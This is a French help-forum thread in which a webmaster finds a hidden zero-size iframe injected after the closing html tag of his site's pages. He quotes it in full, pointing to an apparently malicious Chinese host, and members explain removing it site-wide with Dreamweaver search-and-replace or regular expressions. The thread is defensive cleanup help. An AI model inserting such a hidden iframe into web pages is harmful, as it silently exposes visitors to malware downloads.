Aller au contenu

Sujets conseillés

Posté (modifié)

Bonjour à tous,

Depuis 1 semaine mon PC avait quelques problèmes (bug, plantage, lenteur)

Hier je ne pouvais pu ouvrir ni internet explorer ni firefox, ni nero ...

J'ai donc fait mes sauvegardes sur un autre disque dur et réinstallé XP puis récupéré mes sauvegarde sur mon disque dur.

Depuis j'ai remaqué qu'il y avait un script en bas de toutes mes page de mon site (page html, css, php)

voici ce code :

<iframe src="http://www.ac66.cn/88/index.htm" width="0" height="0" frameborder="0"></iframe>

Apparement il s'agirai d'un TROJAN ou un truc du style.

PS : les pages infectés sont celles de mon PC (celles à envoyer sur le FTP)

Le problème est que je n'ai pas remarqué ce problème au début et donc pas mal de page de mon site (www.macfleid.fr) en sont infécté aussi. Je doit donc ouvrir chacune de mes pages et supprimer ce scrpit un par un ... (travail dur imaginé sur un forum ... je doit refaire en gros)

Avez déjà vu ce genre de problème et y a t-il un moyen de le résoudre avec un correctif qui me supprimerai ce code tout seul de toutes mes pages aussi simplement que la manière dont elles-sont venu ???

Merci de votre aide j'en ai vraiment besoin ...

Modifié par macfleid
Posté

Si tu as cet iframe en bas de toutes les pages, c'est qu'il a été introduit dans le footer. Il te suffit donc d'éditer celui-ci, et le verrouiller ensuite.

Posté (modifié)

Le footer : Editer celui ci !!!!!

Attent j'ai près de 1000 pages à éditer une par une ... jte parle pas d'un simple forun qui est contaminé mais bien de toute les page html.

A mon avis faudrai plutot faire un script qui supprime ce code automatiquement sur toute les pages de la meme maniere que c'est venu mais je m'y connai pas la dedans.

Au passage quelqu'un pourrai me donner un bon anti trojan gratuit ???

Modifié par macfleid
Posté

Tu disais toi-même:

... (travail dur imaginé sur un forum ...

C'est pour cette raison que j'ai envisagé le footer.

Mais si ce sont toutes les pages html de ton site, tu peux envisager d'utiliser un éditeur Web. La majorité permettent le global "search and replace".

Dan

Posté

J'utilise Dreamweaver our faire mes pages.

je pe pas ouvrir 1000 pages d'un coup et à la limite je peux le faire par le blocnote le remplace par.

Mais il faut kan meme faire 1000 fois le boutton remplcer par et ouvir 1000 fichier dans bloc note.

Et en plus il ne sagit pas que de mes page du site. Mes autre page php ou html dans des dossier de jeux ou autre sont infecté aussi sur mon PC.

Un script serai le bienvenue si c'été possible ... Je ne connai rien la dedans et je sais pas si c'est compliqué à faire mais si quelqu'un pourrai m'aider à faire ca ce serai plus que sympa

Posté

Tu n'as pas à cliquer 1000 fois sur le bouton "remplacer"...

Je ne sais pas pour les versions plus anciennes, mais au moins dès la version 4 on peut remplacer une chaîne par une autre (ou par rien) globalement sur tout le contenu du site.

Et tu n'as absolument pas à ouvrir tous les fichiers en une fois, en fait tu n'en ouvres même pas un seul. :)

Posté (modifié)

a ben si ca marche comme ca ca peut etre interessant mais ... si tu pouvais me dire comment ... Je trouve pas

PS : j'ai la version 2004

Modifié par macfleid
Posté

Tu ouvres DreamWeaver, choisis le site à modifier.

Menu édition->Rechercher et remplacer

Tu sélectionnes "site local entier" dans le premier menu déroulant

Tu sélectionnes "Code source" dans le second menu.

Tu entres ta chaîne dans la case supérieure et laisses la case inférieure vide.

Et ensuite tu cliques sur "Remplacer Tout"...

C'est bien décrit dans la doc ;)

Posté

Merci Dan pour ton explication !!!

J'ai pu le faire sur ton mon disque C:

Seul problème c'est que les code inséré par ce trojan n'est pas toujours le même ... parfois juste une partie et pas souvent la même ...

PAr contre une chose est en commun à chaque fois : ce code est toujours situé après les fermeture de ma balise <html> donc faudrai un systeme permettant de suprimer tout ce qui ce trouve après cet emplacement si c'est possible (et que je sois sur qu'il n'y ai jamais rien après cette balise que je dois conserver)

Et si quelqu'un airai un lien ou un nom d'un anti Trojan gratuit ... car depuis j'ai un peu peur :(

Et j'ai du nouveau concernant le virus. Il a été détécté (sur PC de mon travail avec viruscan) à l'ouverture d'une page du site qui contenai ce code et il ma apporté un rapport "Downloader-AYJ" et me donne aussi différent nom de correctif

Backdoor.Win32.SdBot.aqj (Kaspersky)

W32.Spybot.Worm (Symantec)

W32/Sdbot.IAZ.worm (Panda Antivirus)

WORM_RBOT.ASL (Trend Micro)

Me reste à le trouver pour AVG si ca existe ... car j'ai pas les d'anti-virus aussi cher que Kaspersky et le piratage ne me tente pu depuis longtemp :smartass:

Voila merci encore

Posté

Dans ce cas il suffit d'utiliser les expressions régulières, il y a tout un chapitre du manuel qui traite le sujet.

Et pour info, dis au responsable de l'antivirus de ta boîte que le site http://www.lisons.info n'a pas de virus mais une adresse email obfuscée en JavaScript. Je m'occupe personnellement de ce site, et ai programmé moi même cette obfuscation.

Leur paramétrage d'antivirus n'est pas bon s'il détecte ça comme un virus ! :lol:

Posté

Pour ce qui est de ton site, le message qui apparait de l'anti virus est le même que lorsque j'ouvre une de mes pages infecté par mon virus donc je trouvé ca quand même bizzar d'autant plus qu'en plus d'un 1 an c'été la première fois qu'un site me sortai ce genre d'erreur ...

Donc pas si fréquent que ca ...

Et je passe mes journée sur le net au travail c'est pour dire que de site j'en ai visité à la pelle.

En plus j'en été arrivé à parler de ce site pour une raison qui na pas vraiment de rapport avec ce sujet et qui fesai suite à un problème qui n'en été pas un en fait ...

Pour les expressins régulière je verrai ca ce weekend j'ai ai vraiment raz le bol je vais laisser en attente quelques jours ca le fera aussi du bien LoL

Posté
Pour ce qui est de ton site, le message qui apparait de l'anti virus est le même que lorsque j'ouvre une de mes pages infecté par mon virus donc je trouvé ca quand même bizzar d'autant plus qu'en plus d'un 1 an c'été la première fois qu'un site me sortai ce genre d'erreur ...

Donc pas si fréquent que ca ...

Et je passe mes journée sur le net au travail c'est pour dire que de site j'en ai visité à la pelle.

En plus j'en été arrivé à parler de ce site pour une raison qui na pas vraiment de rapport avec ce sujet et qui fesai suite à un problème qui n'en été pas un en fait ...

Tu passes certainement beaucoup de temps sur le web, mais si c'est la première fois que cela t'arrive, c'est que c'est la première fois que tu tombes sur un site dont l'adresse email est sécurisée pour éviter que celle-ci soit lue par les emails harvesters :whistling: (Donc un site trop bien conçu pour toi :hypocrite: )

D'autre part, tu as été amené à parler de ce site : parce qu'il y avait un problème sur le tien en signature. Je persiste et signe :!:

Veuillez vous connecter pour commenter

Vous pourrez laisser un commentaire après vous êtes connecté.



Connectez-vous maintenant
×
×
  • Créer...